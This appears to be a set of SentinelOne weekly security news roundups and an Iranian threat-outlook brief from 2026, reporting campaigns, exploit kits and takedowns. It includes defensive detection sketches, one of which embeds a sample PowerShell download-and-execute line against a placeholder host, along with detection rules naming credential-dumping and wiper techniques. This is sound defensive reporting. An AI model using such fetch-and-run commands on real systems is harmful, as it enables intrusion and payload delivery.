Notably, the entire infection chain executes in under 30 seconds, enabling rapid compromise and data theft. By selectively targeting domain-joined systems, attackers ensure high-value corporate credentials are harvested, making the campaign particularly dangerous for enterprise environments.

Campaigns like FAUX#ELEVATE show that even heavily obfuscated malware still presents multiple choke points for detection, from malicious scripting chains and abuse of legitimate services to anomalous outbound traffic. A modern, capable EDR with strong behavioral detection and endpoint visibility can detect and stop activity like this despite the obfuscation.

The Ugly | TeamPCP Hijacks Trivy, npm, and LiteLLM to Steal Credentials Worldwide

Over the past week, a cloud-focused threat actor called TeamPCP orchestrated a multi-stage, global supply chain campaign, beginning with a compromise of the widely-used Trivy vulnerability scanner. By injecting malicious code into Trivy v0.69.4 and associated GitHub Actions, TeamPCP harvested credentials, SSH keys, cloud tokens, CI/CD secrets, and cryptocurrency wallets. The malware persisted via systemd services and exfiltrated stolen data to typosquatted or attacker-controlled domains.

Source: Phoenix Security

Following the Trivy breach, TeamPCP deployed CanisterWorm, a self-propagating npm malware that leveraged compromised developer tokens to infect additional packages. CanisterWorm used a decentralized ICP canister as a resilient dead-drop C2, enabling automated payload updates and credential theft without direct attacker interaction.

The group then expanded to Aqua Security’s broader GitHub ecosystem, tampering with private repositories and Docker images, and to Checkmarx workflows and VS Code extensions, using the same credential-stealing payload to cascade compromises across CI/CD pipelines. Kubernetes clusters have also been targeted with scripts that wiped machines in Iranian locales while installing persistent backdoors elsewhere, demonstrating both selective destruction and lateral movement.

In the most recent leg of the offensive, TeamPCP compromised the popular “LiteLLM” Python package on PyPI, embedding the same cloud stealer and persistence mechanisms into versions 1.82.7 and 1.82.8. The attack harvested credentials, accessed Kubernetes secrets, and installed persistent systemd services while exfiltrating data to infrastructure controlled by the attackers.

Across this cluster of linked incidents, TeamPCP’s operations highlight the danger of credential reuse, incomplete secret rotation, and weak CI/CD hygiene, pointing to how a single supply chain compromise can cascade into a multi-platform, multi-stage attack that spans open-source software, cloud services, and developer ecosystems.

The Good, the Bad and the Ugly in Cybersecurity – Week 12

The Good | Operation Synergia III Disrupts Malicious Networks & the EU Sanctions State-Sponsored Attackers

Operation Synergia III, an Interpol-led crackdown spanning July 2025 to January 2026, has disrupted cybercrime infrastructure across the globe. Authorities across 72 countries sinkholed 45,000 malicious IP addresses and seized 212 devices and servers, resulting in 94 arrests and 110 ongoing investigations.

The operation focused on taking down servers used in connection to extensive phishing, ransomware, malware, and fraud networks. Regional actions highlighted the breadth of the cyber activity: Bangladesh police arrested 40 suspects tied to scams and identity theft, while law enforcement in Togo dismantled a fraud ring engaged in social engineering, including romance scams and sextortion.

Source: emailexpert

In Macau, investigators uncovered over 33,000 phishing sites impersonating casinos, banks, and government services, all poised to steal financial data. Building on earlier phases of the operation and complementary operations like Red Card 2.0, Serengeti, and Africa Cyber Surge, these joint efforts point to the growing sophistication of cybercrime and the critical role that coordinated international actions play in stemming its reach.

To further hinder threat actors, the Council of the European Union has sanctioned three companies and two individuals tied to major cyberattacks on critical infrastructure.

China-linked Integrity Technology Group supported operations that compromised over 65,000 devices across six EU countries, while Anxun Information Technology (aka i-SOON) provided hacker-for-hire services targeting governments. Two of its co-founders have also been sanctioned for their part in executing the cyberattacks.

Iran-based company Emennet Pasargad has also been sanctioned for multiple influence campaigns and breaches, including phishing and disinformation efforts.

The Bad | Researchers Uncover ‘DarkSword’ iOS Exploit Stealing Sensitive Personal Data

A new iOS exploit chain and payload dubbed ‘DarkSword’ is stealing sensitive personal information from iPhones running iOS 18.4 to 18.7. The toolkit is linked to multiple threat actors, including Russian-aligned UNC6353, who previously leveraged a similar exploit chain called Coruna. DarkSword was subsequently uncovered while various researchers analyzed Coruna’s infrastructure.

In early November 2025, UNC6748 used DarkSword against Saudi Arabian users via a Snapchat-themed website. Subsequently, other attackers linked to PARS Defense, a Turkish commercial surveillance firm, started running the exploit kit on Apple devices. Early this year, cases involving DarkSword were spotted across Malaysia and, most recently, it has been leveraged to target Ukrainian users.

The snapshare[.]chat decoy page (Source: GTIG)

DarkSword exploits six documented vulnerabilities (CVE-2025-31277, CVE-2025-43529, CVE-2026-20700, CVE-2025-14174, CVE-2025-43510, CVE-2025-43520), which Apple has since patched. Threat actors have used them to deliver at least three malware families: GHOSTBLADE (a data miner collecting crypto, messages, photos, and locations), GHOSTKNIFE (a backdoor exfiltrating accounts and communications), and GHOSTSABER (a JavaScript backdoor enumerating devices and executing code).

The delivery chain begins via Safari exploits, gaining kernel access and executing a main orchestrator (pe_main.js) that injects modules into privileged iOS services, including App Access, Wi-Fi, Keychain, and iCloud. Collected data spans passwords, messages, contacts, call history, location, browser history, Apple Health, and cryptocurrency wallets. The malware removes traces after exfiltration, indicating a focus on rapid theft rather than persistent surveillance.

Experts note that both DarkSword and Coruna exhibit signs of large language model (LLM)-assisted code expansion, showing professional design with maintainability and modularity in mind. Users are advised to update to iOS 26.3.1 and enable Lockdown Mode if at high risk.

The Ugly | Interlock Ransomware Exploits Cisco FMC Zero-Day to Breach Enterprise Firewalls

The Interlock ransomware group has been actively exploiting a critical remote code execution (RCE) zero-day in Cisco’s Secure Firewall Management Center (FMC) software since late January 2026. The vulnerability, tracked as CVE-2026-20131 (CVSS: 10.0), allows unauthenticated attackers to execute arbitrary code with root privileges on unpatched devices due to insecure deserialization of a user-supplied Java byte stream. Cisco has since issued a patch, urging customers to update immediately.

Interlock ransomware group is now exploiting a Cisco firewall bug patched on March 4

The bug is a CVSSv3 10/10 RCE in the Cisco Secure Firewall Management Center (FMC) Software: sec.cloudapps.cisco.com/security/cen…


— Catalin Cimpanu (@campuscodi.risky.biz) 19 March 2026 at 10:42

Interlock, first seen in September 2024, has a history of high-profile attacks, including deploying the NodeSnake remote access trojan (RAT) against U.K. universities. The group has claimed responsibility for incidents affecting organizations such as DaVita, Kettering Health, the Texas Tech University System, and the city of Saint Paul, Minnesota. IBM X-Force researchers recently noted Interlock’s deployment of a new AI-assisted malware strain called Slopoly, highlighting the group’s evolving capabilities.

Latest reports explain that Interlock exploited the FMC flaw 36 days before its public disclosure, beginning on January 26, giving operators a head start to compromise firewalls before defenders were aware. This early access allowed attackers to operate undetected, underlining the danger of zero-day vulnerabilities.

Cisco has faced a series of zero-day exploits in 2026 so far. Earlier this year, maximum-severity flaws in Cisco AsyncOS email appliances, Unified Communications, and Catalyst SD-WAN were patched after being actively exploited, allowing attackers to bypass authentication, compromise controllers, and insert malicious peers.

The most recent incidents affecting FMC demonstrate both Interlock’s aggressive targeting of enterprise networks and the importance of rapid patch management and coordinated vulnerability disclosure. Organizations using Cisco FMC are strongly urged to apply the latest updates to mitigate ongoing risk.

The Good, the Bad and the Ugly in Cybersecurity – Week 11

The Good | Authorities Disrupt Proxy Network and Charge BlackCat Insider, Vendors Patch Critical RCE Bugs

U.S. and European law enforcement have dismantled the SocksEscort cybercrime proxy network, which relied on Linux edge devices infected with AVRecon malware. New research found that the service maintained roughly 20,000 compromised devices weekly and offered criminals access to ‘clean’ residential IP addresses from major internet service providers to evade blocklists. Since 2020, the platform has advertised access to hundreds of thousands of IPs. Now, authorities have seized dozens of servers and domains, frozen $3.5 million in cryptocurrency, and disconnected infected routers, all previously linked to significant fraud and cryptocurrency theft.

Former DigitalMint employee Angelo Martino has been charged with conspiring with the BlackCat (aka ALPHV) ransomware group while serving as a ransomware negotiator. Prosecutors say that between 2023 and 2025, Martino shared confidential negotiation details and, operating as a BlackCat affiliate alongside various accomplices, participated in attacks. Victims included multiple U.S. organizations, with ransom payments exceeding $26 million and BlackCat operators taking a 20% cut of the proceeds. Since the group emerged in 2021, the FBI has attributed thousands of victims and over $300 million in ransom payments to it.

Microsoft’s Patch Tuesday for the month delivers security updates for 79 vulnerabilities, including two publicly disclosed zero-day flaws. The release also addresses three critical vulnerabilities: two remote code execution (RCE) bugs and one information disclosure issue.

The two zero-days, an SQL Server elevation-of-privilege flaw (CVE-2026-21262) and a .NET denial-of-service bug (CVE-2026-26127), are not known to be actively exploited. The RCE bugs in Microsoft Office, however, are exploitable via the preview pane, as is an Excel information disclosure flaw (CVE-2026-26144) that could leak data through Copilot.

Users are urged to prioritize updates to secure Office, Excel, SQL Server, and .NET environments.

The Bad | Attackers Exploit FortiGate Next-Gen Firewalls to Breach Networks

Threat actors are exploiting FortiGate Next-Generation Firewall (NGFW) appliances to gain access to targeted networks. A new post from SentinelOne outlines a consistent theme across these attacks: targeted victims did not retain appliance logs, making it impossible to determine how and when the intruders gained access.

What happens when the FortiGate next-generation firewall protecting your network becomes the backdoor? 🚪

Our DFIR team has been tracking a wave of FortiGate NGFW compromises. Attackers are exploiting vulnerabilities to extract config files, steal service account credentials,… pic.twitter.com/Q9egoLwfN2

— SentinelOne (@SentinelOne) March 10, 2026


To date, attackers have leveraged known vulnerabilities (CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858) and weak credentials to extract configuration files containing service account credentials and network topology information. These accounts, often linked to Active Directory (AD) and Lightweight Directory Access Protocol (LDAP), allowed attackers to map roles, escalate privileges, and move laterally within environments.

In one case, an attacker compromised a FortiGate appliance in November 2025, creating a local administrator account named support and adding unrestricted firewall policies. The attacker later decrypted the configuration file to extract LDAP service account credentials, which were used to enroll rogue workstations into AD, enabling deeper access. Network scanning triggered alerts, stopping further lateral movement.
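The rogue-workstation step leaves a distinctive trail: Windows records Security event ID 4741 whenever a computer account is created, and a machine account created by an LDAP service account that never normally enrolls devices is a strong signal. A minimal sketch, where the dict-based export format and the enroller allowlist are assumptions for illustration:

```python
# Sketch: flag rogue machine enrollments from exported Windows Security events.
# Event ID 4741 = "A computer account was created". The dict-based export format
# and the allowlist below are assumptions for illustration.

# Accounts that legitimately enroll machines (site-specific allowlist)
AUTHORIZED_ENROLLERS = {"MDT-JOIN$", "SCCM-SVC"}

def flag_rogue_enrollments(events):
    """Return 4741 events whose creating account is not an authorized enroller."""
    suspicious = []
    for ev in events:
        if ev.get("EventID") != 4741:
            continue
        if ev.get("SubjectUserName", "") not in AUTHORIZED_ENROLLERS:
            suspicious.append(ev)
    return suspicious

events = [
    {"EventID": 4741, "SubjectUserName": "SCCM-SVC", "TargetUserName": "WKS-0142$"},
    # An LDAP bind account creating a machine account matches the pattern above
    {"EventID": 4741, "SubjectUserName": "svc-ldap-bind", "TargetUserName": "DESKTOP-X9$"},
    {"EventID": 4624, "SubjectUserName": "alice"},
]

for ev in flag_rogue_enrollments(events):
    print(f"ALERT: {ev['SubjectUserName']} created {ev['TargetUserName']}")
```

In practice, this kind of check would run against events forwarded to a SIEM rather than an in-memory list.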

In another incident, attackers rapidly deployed legitimate Remote Monitoring and Management (RMM) tools, Pulseway and MeshAgent, and downloaded malware from AWS and Google Cloud storage. The Java payload, executed via DLL side-loading, exfiltrated the NTDS.dit file and SYSTEM registry hive to an external server, potentially enabling credential harvesting, though no subsequent misuse was observed.

These incidents highlight the high value of NGFW appliances, which threat actors are exploiting for cyber espionage or ransomware attacks. SentinelOne emphasizes enforcing strong administrative access controls, maintaining up-to-date patches, and retaining detailed FortiGate logs for at least 14 days, ideally forwarded to a Security Information and Event Management (SIEM) platform, to detect configuration exports and unauthorized account creation. Proper monitoring, combined with automated defenses, can significantly reduce attacker dwell time and prevent full-scale network compromise.
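Detecting configuration exports and unauthorized account creation in forwarded logs can start as simple pattern matching over the event stream. A minimal sketch, assuming FortiGate-style key=value syslog lines; the specific field names and message strings below are illustrative assumptions, not an exact FortiGate schema:

```python
# Sketch: scan FortiGate-style key=value syslog lines for config exports and
# admin account creation. Field names and message strings are illustrative
# assumptions, not an exact FortiGate schema.
import re

SUSPICIOUS_PATTERNS = [
    re.compile(r'action="?backup"?', re.I),             # config file export
    re.compile(r'logdesc="Admin account added"', re.I), # new administrator
]

def parse_kv(line):
    """Parse key=value (optionally quoted) pairs from one syslog line."""
    return dict(re.findall(r'(\w+)=("[^"]*"|\S+)', line))

def scan(lines):
    hits = []
    for line in lines:
        if any(p.search(line) for p in SUSPICIOUS_PATTERNS):
            hits.append(parse_kv(line))
    return hits

sample = [
    'date=2025-11-04 user="support" action="backup" msg="Config backed up via GUI"',
    'date=2025-11-04 logdesc="Admin account added" user="admin" newuser="support"',
    'date=2025-11-04 action="login" user="admin" status="success"',
]

for hit in scan(sample):
    print("ALERT:", hit)
```

A real deployment would express these as SIEM correlation rules rather than a standalone script, but the detection logic is the same.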

The Ugly | Iran-Linked Hacktivist ‘Handala’ Wipes Stryker MedTech Systems Worldwide

Medical technology giant Stryker has suffered a major cyberattack involving wiper malware claimed by Handala, a pro-Palestinian hacktivist group linked to Iran.

Handala says it stole 50 terabytes of data and wiped over 200,000 systems, servers, and mobile devices, forcing office shutdowns in 79 countries. Employees in the U.S., Ireland, Costa Rica, and Australia reported that corporate and personal devices enrolled for work were wiped, disrupting access to Microsoft systems, Teams, VPNs, and other applications, with some locations reverting to manual workflows.

Login screens taken over by the Handala logo (Source: WWMT.com)

At the time of the incident, staff were instructed to remove corporate management and applications from personal devices. Stryker later confirmed the incident in a Form 8-K filing with the SEC, describing a global disruption affecting its Microsoft environment. The company activated its cybersecurity response plan and is working with internal teams and external experts. The incident appears contained and involved no ransomware, though full restoration timelines remain unknown.

Handala, active since December 2023, is known to target Israeli organizations with destructive malware that wipes Windows and Linux systems, often publishing stolen sensitive data. This attack marks a major disruption for Stryker, which employs over 53,000 people and reported $22.6 billion in global sales in 2024.

Cybersecurity experts warn that Iranian state-aligned actors, including APT groups and proxy hacktivists, frequently use cyber operations for retaliation and disruptive campaigns during geopolitical escalations. They are likely to increase attacks against U.S. organizations, critical infrastructure, and allied sectors. Organizations are urged to strengthen security controls and prepare for potential follow-on campaigns targeting networks and operations.

The Good, the Bad and the Ugly in Cybersecurity – Week 10

The Good | Global Authorities Disrupt Tycoon2FA, LeakBase & Phobos Ransomware

Europol has successfully disrupted Tycoon2FA in an international operation, taking down the phishing-as-a-service (PhaaS) platform responsible for sending tens of millions of phishing emails each month. Authorities seized 330 domains used to host phishing pages and control infrastructure.

Active since 2023, Tycoon2FA enabled attackers to bypass multi-factor authentication (MFA) using adversary-in-the-middle (AitM) techniques that captured credentials and session cookies. Sold through Telegram for about $120, the service allowed low-skill criminals to launch large-scale phishing attacks against organizations worldwide.

In another seizure, LeakBase, a major cybercrime forum used to trade stolen data and hacking tools, was taken down as part of Operation Leak, a joint effort by the FBI, Europol, and law enforcement in 14 countries. Police seized two domains, posted seizure banners, executed search warrants, and made arrests worldwide.

LeakBase had amassed 142,000 members since 2021 and offered leaked databases, exploits, and cybercrime services. All forum data, including accounts, messages, and IP logs, has been preserved as evidence, with the seizure now entering a prevention phase to deter further cybercrime.

A Russian national, Evgenii Ptitsyn, has pleaded guilty to wire fraud conspiracy for his role running the Phobos ransomware operation. Since 2020, Phobos has targeted over 1000 organizations worldwide, including schools, hospitals, and government agencies, collecting more than $39 million in ransom payments. Phobos affiliates were responsible for infiltrating victim networks, encrypting data, exfiltrating sensitive files, and paying Ptitsyn a per-deployment fee in exchange for the corresponding decryption keys.

Ptitsyn himself managed ransomware sales, distributed decryption keys, and took a cut of all affiliate payments. His sentencing is scheduled for July 15; he faces up to 20 years in prison.

The Bad | Researchers Uncover ‘Coruna’ Exploit Kit Mass Targeting iOS Devices

Multiple threat actors have deployed Coruna, a previously unknown iOS exploit kit containing 23 exploits and five complete exploit chains capable of targeting Apple devices running iOS 13 through iOS 17.2.1.

Researchers first observed parts of the Coruna framework in February 2025 while investigating activity linked to a commercial surveillance vendor. The exploit kit uses a sophisticated JavaScript delivery framework that fingerprints a victim’s device and operating system before selecting the most effective exploit chain.
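Conceptually, that selection logic is a version-dispatch table: fingerprint the client, then serve only the chain whose supported range contains the reported OS version, and serve nothing otherwise. The sketch below illustrates the idea only; the chain names and version ranges are invented, with iOS 13 through 17.2.1 as the overall window reported for Coruna:

```python
# Illustrative sketch of version-gated dispatch as used by exploit-delivery
# frameworks: fingerprint the client, then pick the matching chain.
# Chain names and ranges are invented; only the overall iOS 13-17.2.1 window
# comes from the report.

def parse_version(s):
    return tuple(int(x) for x in s.split("."))

# (min_inclusive, max_inclusive, chain_name) -- hypothetical entries
CHAINS = [
    ((13, 0), (14, 8, 1), "chain-A"),
    ((15, 0), (16, 7, 5), "chain-B"),
    ((17, 0), (17, 2, 1), "chain-C"),
]

def select_chain(ios_version):
    v = parse_version(ios_version)
    for lo, hi, name in CHAINS:
        if lo <= v <= hi:
            return name
    return None  # unsupported version: deliver nothing, stay quiet

print(select_chain("15.8.5"))  # falls in chain-B's range
print(select_chain("18.0"))    # outside the targeted window -> None
```

The "deliver nothing" branch is what makes such kits hard to study: unsupported or instrumented clients never receive an exploit at all.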

Several of the exploits rely on advanced techniques such as WebKit remote code execution (RCE), pointer authentication code (PAC) bypasses, sandbox escapes, kernel privilege escalation, and Page Protection Layer (PPL) bypasses. Some vulnerabilities included in the kit were previously associated with Operation Triangulation, a high-profile iOS espionage campaign uncovered in June 2023.

Coruna exploit chain delivered on iOS 15.8.5 (Source: GTIG)

Over time, Coruna has spread across different threat ecosystems. In mid-2025, a suspected Russian espionage group, UNC6353, used the framework in watering hole attacks targeting visitors to compromised Ukrainian websites. Later that year, the exploit kit appeared on fake Chinese cryptocurrency and gambling websites linked to a financially motivated threat actor.

Once exploitation succeeds, attackers deploy a loader known as PlasmaLoader, which downloads additional modules designed primarily to steal cryptocurrency wallet data and sensitive information. Targeted data includes wallet recovery phrases, financial information, and other stored text. Stolen data is encrypted before being transmitted to attacker-controlled infrastructure.

Coruna demonstrates how advanced spyware-grade exploit frameworks can spread from surveillance vendors to nation-state actors and eventually cybercriminal groups, highlighting the growing commercialization and reuse of sophisticated zero-day capabilities in the mobile threat landscape.

The Ugly | Hacktivists Launch Retaliatory Cyberattacks After U.S.–Israel Strikes on Iran

Following the U.S.-Israel military operations against Iran, cybersecurity researchers are flagging a spike in retaliatory hacktivist activity codenamed ‘Epic Fury’ and ‘Roaring Lion’. The surge has primarily taken the form of distributed denial-of-service (DDoS) attacks, data leaks, and online disruption targeting both government and critical infrastructure organizations.

A new report describes how three main hacktivist groups, Keymous+, DieNet, and NoName057(16), have been responsible for nearly 70% of observed attack activity between February 28 and March 2, 2026. The first recorded attack during this period was launched by Hider Nex (aka Tunisian Maskers Cyber Force), a pro-Palestinian hacktivist collective that combines DDoS attacks with data breaches to support geopolitical messaging.

Hider Nex claiming the first DDoS attack on Telegram (source: Radware)

In total, researchers recorded 149 DDoS attacks targeting 110 organizations across 16 countries, carried out by 12 hacktivist groups. The majority of attacks focused on the Middle East, with 107 incidents targeting regional organizations. Government entities were the most affected sector, accounting for nearly 48% of the victims, followed by organizations in financial services and telecommunications.

Several other cyber threats have emerged alongside the hacktivist campaigns. Pro-Russian groups are claiming breaches of Israeli military networks, while threat actors are running an active SMS phishing campaign that distributes malware disguised as an Israeli civil defense alert app. Iranian state-linked actors associated with the Islamic Revolutionary Guard Corps (IRGC) have reportedly targeted regional energy and digital infrastructure, striking major oil refineries and data centers in the U.A.E.

Iranian-aligned cyber actors have historically blended espionage, disruption, and influence operations during geopolitical crises, suggesting the potential for broader targeting of government, infrastructure, financial, and technology sectors on a global scale.

SentinelOne Intelligence Brief: Iranian Cyber Activity Outlook

To Our Partners and Customers

The following intelligence brief was sent to all SentinelOne partners and customers today:

Executive Summary

Recent U.S. and Israeli strikes against Iranian targets, followed by Iranian attacks on multiple regional locations, present a highly dynamic geopolitical situation with credible cyber threat implications. Iran has historically incorporated cyber operations into periods of regional escalation.

Given the rapid escalation of geopolitical tensions, we assess that Iranian state-aligned cyber activity is likely to intensify in the near-term based on a long track record of leveraging cyber operations for asymmetric retaliation, coercive signaling, and strategic messaging. Prior campaigns, including destructive wiper malware, infrastructure disruption, and influence operations masquerading as ‘hacktivism’, demonstrate both capability and intent to operate in the cyber domain alongside kinetic action.

At the time of publication, SentinelOne has not attributed significant malicious cyber activity directly to these recent events. We have no indications that SentinelOne or our customers are being specifically targeted in connection with these developments.

This report outlines Iran’s historical cyber posture, relevant tactics and tradecraft, and our forward-looking assessment of potential cyber responses in the days and weeks following the airstrikes.

We assess with high confidence that organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting – particularly within government, critical infrastructure, defense, financial services, academic, and media sectors.

We recommend that all clients, especially those operating in, or supporting, U.S. and Israeli infrastructure, review their security posture and preparedness accordingly.

This assessment is current as of February 28, 2026 and reflects a rapidly evolving threat environment.

Iran’s Cyber Operations to Date

Iran presents a mature, well-resourced cyber threat, drawing on more than fifteen years of experience across a wide range of malicious cyber operations.

Iran uses a diverse set of cyber tools to further state objectives, particularly preservation of the Iranian regime, including:

  • Espionage and credential theft via APT34, APT39, APT42, and MuddyWater, targeting a wide range of military, civilian, telecommunications, and academic institutions, particularly against regional targets (Israel, Middle East) and the United States
  • Disruptive and destructive campaigns, including the use of wiper malware
  • Targeted spearphishing and social engineering campaigns, supporting strategic intelligence collection across multiple industries
  • Fake hacktivist personas for plausible deniability and psychological impact (e.g., DarkBit, Cyber Av3ngers)
  • Coordinated disinformation and influence ops across Telegram, X, and compromised news outlets
  • Internet blackouts within Iran to control public opinion and narrative, while similarly countering the effect of foreign influence operations
  • Proxy ransomware and criminal fronts blurring lines between state and financially motivated actors

Iranian cyber actors have previously aligned their operations with kinetic campaigns, often acting as a force multiplier for regional allies like Hamas or as a standalone tool of retaliation. The TTPs employed by Iranian hacktivists increasingly mirror those used by state-sponsored APTs, raising critical questions about capability sharing and formal command-and-control relationships within this environment.

Expected Iranian Cyber Response to Current Events

1 – Precision Espionage Operations

Expect escalated targeting of Israeli defense, government, and intelligence networks using spearphishing, credential harvesting, and deployment of custom malware. Historically, groups such as APT34 (OilRig) and APT42 (TA453) leveraged legitimate access to move laterally and exfiltrate strategic intelligence. Additionally, U.S. military and government organizations will likely be targeted in similar campaigns.

Anticipated Targets:

  • U.S. military and government organizations
  • Israeli defense entities and affiliated research organizations
  • U.S. and Israeli diplomatic infrastructure
  • Defense contractors and supply chain partners
  • Strategic allies and locations in theater

2 – Disruptive & Destructive Tactics

Iran has a well-documented history of using destructive malware and DDoS attacks to disrupt the critical infrastructure of its adversaries. We assess a high likelihood of similar tactics being deployed against U.S. and Israeli sectors, particularly utilities and public-facing systems.

Key techniques include:

  • Deployment of wipers via fake hacktivist personas or directly-attributed APT clusters
  • Exploitation of unpatched or poorly secured public-facing web services for defacement and initial access
  • Use of scheduled tasks and LOLBins to execute custom wiper malware with stealth and persistence
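Defenders can hunt for the scheduled-task technique by scanning exported task definitions for LOLBin invocations. The sketch below parses the standard Task Scheduler XML format; the LOLBin list is a small illustrative subset, and any real rule would combine this with context such as task author and creation time:

```python
# Sketch: scan Windows scheduled-task XML for commonly abused LOLBins.
# The XML shown uses the standard Task Scheduler schema; the LOLBin list is a
# small illustrative subset.
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "wscript.exe"}

def suspicious_actions(task_xml):
    """Return (command, arguments) pairs whose command is a known LOLBin."""
    root = ET.fromstring(task_xml)
    hits = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        if cmd.lower().rsplit("\\", 1)[-1] in LOLBINS:
            hits.append((cmd, args))
    return hits

sample = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions><Exec>
    <Command>C:\\Windows\\System32\\rundll32.exe</Command>
    <Arguments>wiper.dll,Start</Arguments>
  </Exec></Actions>
</Task>"""

for cmd, args in suspicious_actions(sample):
    print("ALERT:", cmd, args)
```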

Anticipated Targets:

  • Transportation, Communication, Energy and Water utilities in U.S. and Israel
  • Telecom, alerting systems, and national broadcast infrastructure
  • Financial platforms and digital banking services

3 – Coordinated Influence & Disinformation Campaigns

Iranian-aligned actors are likely to amplify disinformation campaigns to shape public perception, particularly around civilian impact, military failure, and geopolitical instability. These efforts often run concurrently with real-world escalations and aim to degrade public trust in institutions.

Anticipated Themes:

  • Allegations of Israeli war crimes
  • U.S. and Israeli military losses
  • Fabricated claims of successful Iranian cyber retaliation
  • Disinformation on U.S.–Israel political division
  • Leaks of manipulated or stolen documents misattributed to Israeli insiders
  • Lack of support from the U.S. populace for ongoing strikes against Iran

4 – Probing Attacks on U.S. & Israeli Infrastructure

Iran has demonstrated readiness to expand attacks to Western infrastructure during periods of high tension. Recent examples include the exploitation of Unitronics PLCs at U.S. water treatment plants (late 2023), highlighting a shift toward ICS/OT targets. Such actions serve retaliatory and signaling purposes and are often designed to be low-impact yet high-visibility to maximize psychological effect.

Anticipated Targets:

  • U.S. defense industrial base, especially contractors supporting military action
  • Israeli military and key government organizations
  • Critical infrastructure (water, energy, transportation) in the U.S. and Israel
  • Regional partners (e.g., Jordan, UAE, Egypt, Saudi Arabia) aligned with U.S. and Israeli interests
  • Media and academic institutions reporting on the conflict

SentinelOne Detection & Monitoring Posture

SentinelOne research and detection teams have closely followed Iranian cyber actors for many years. We provide multiple layers of protection and are closely monitoring emerging threat intelligence to maximize coverage.

We extensively cover techniques known to be used by Iranian threat groups including:

  • PowerShell and script abuse
  • Proxy tools
  • Credential theft
  • Keylogger components
  • Wipers
  • Browser credential theft
  • DLL sideloading
  • Tunneling tools (ngrok/Cloudflared)
  • Scheduled task persistence
  • Remote access tool abuse
  • Active Directory reconnaissance
  • Destructive boot tampering

These protections are not Iran-specific but are known to be effective in detecting Iranian operations.

We are monitoring the situation closely and can ship new detections quickly through Platform Rules updates or Live Security Updates.

For maximum protection, we recommend:

  • Turning on Live Updates
  • Ensuring you’re opted-in to Emerging Threat Platform Rules
  • Activating Platform Detection Library rules listed in Appendix A

Recommendations

  1. Increase Vigilance Against Phishing and Credential Abuse
  • Prioritize MFA enforcement and internal phishing detection
  • Monitor for abuse of VPN, email, and collaboration platforms
  • Monitor for suspicious activity involving legitimate user accounts and applications
  2. Harden Critical Infrastructure and OT Environments
  • Patch and segment exposed ICS components, especially common HMI/PLC vendors
  • Scan all Internet-facing infrastructure, and patch any vulnerable Internet-facing services
  • Consider removing or restricting network access to any non-critical Internet-facing services, especially if they are not protected by MFA
  • Review DDoS mitigation playbooks and response procedures
  3. Monitor for Influence Operations and Fake Leaks
  • Establish rapid communication response protocols for disinformation relevant to your organization
  • Be prepared for threat actors using “hacktivist” branding and Telegram or similar platforms for communication
  • Assume masquerade efforts are likely; determining true origin requires a detailed assessment
  4. Review and Test Incident Response Plans
  • Ensure IR and SOC teams maintain heightened alert status
  • Simulate data-wipe and ransomware scenarios
  • Simulate corporate social media hijacking scenarios and prepare for account pausing/access resets
  5. Establish Clear Points of Contact
  • Ensure the internal organization has direct POCs for security incident support
  • Communicate posture expectations and escalation paths internally
  6. Monitor for Activity Associated with Iranian State-Aligned Threat Actors

SentinelOne is proactively hunting for IOCs and TTPs associated with these groups. These threat hunts are being performed for all Wayfinder Threat Hunting customers. Any related hunt findings will be visible in the Wayfinder Threat Hunting dashboard.

Closing Note

This report is intended to support informed decision-making and proactive defensive measures amid a dynamic and escalating geopolitical conflict.

The cyber threat landscape associated with Iranian state-aligned actors is adaptive, and we assess that both targeting priorities and tactics may shift rapidly in response to real world developments, political statements, or perceived provocations.

We advise clients to treat this as a time-sensitive assessment and to revisit posture, incident response, and monitoring processes regularly.

For immediate questions or escalations, please contact your Client Success Lead or reach our Support teams directly at: https://www.sentinelone.com/global-services/get-support-now/

Appendix

Customers should consider activating Platform Detection Library rules to improve coverage. The following rules are known to be effective against Iranian cyber operations:

MuddyWater

  • Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading

Credential Dumping

  • Suspicious Task Creation for Credential Harvesting
  • Python-Based Network Exploitation Tool
  • Potential LSASS Dumping Tools
  • Credential Dumping via Shadow Copy
  • Interactive NTDS Harvesting via VSS
  • Cached Domain Credential Dumping

Tunneling & Remote Access

  • Ngrok Domain Contacted
  • Cloudflared Persistent Tunnel Establishment Detected
  • Anomalous Process Initiating Cloudflare Tunnel Traffic

Collection & Exfiltration

  • Keylogging Script via PowerShell
  • Chromium Browser Info Stealer via Remote Debugging
  • Browser Credential and Cookie Data Access Attempt

PowerShell/Script Abuse

  • PowerShell Script Execution via Time Based Integer IPv4
  • Suspicious Usage of .NET Reflection via PowerShell
  • Encoded Powershell Launching Command Line Download
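Rules like these typically key on PowerShell’s -EncodedCommand flag, which takes a Base64 string of the UTF-16LE command text (short forms such as -enc, or even -e, are commonly observed in the wild). A minimal sketch of extracting and decoding the payload for inspection:

```python
# Sketch: decode a PowerShell -EncodedCommand argument for inspection.
# The flag's argument is Base64-encoded UTF-16LE command text; the regex also
# accepts common short forms of the flag seen in the wild.
import base64
import re

ENC_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload from a command line, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE after all

# Hypothetical example command line for demonstration
payload = base64.b64encode("IEX (iwr http://203.0.113.5/a.ps1)".encode("utf-16-le")).decode()
print(decode_encoded_command(f"powershell.exe -nop -w hidden -enc {payload}"))
```

Decoded output like the download cradle above is exactly what a rule named “Encoded Powershell Launching Command Line Download” would then inspect for network-fetching commands.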

Defense Evasion, Impact, Discovery

  • Potential DLL Sideloading in PerfLogs Directory
  • Disk Data Wipe Attempt via Dd Utility
  • Boot Configuration Tampering via BCDEdit
  • BloodHound Active Directory Reconnaissance File Creation

The Good, the Bad and the Ugly in Cybersecurity – Week 9

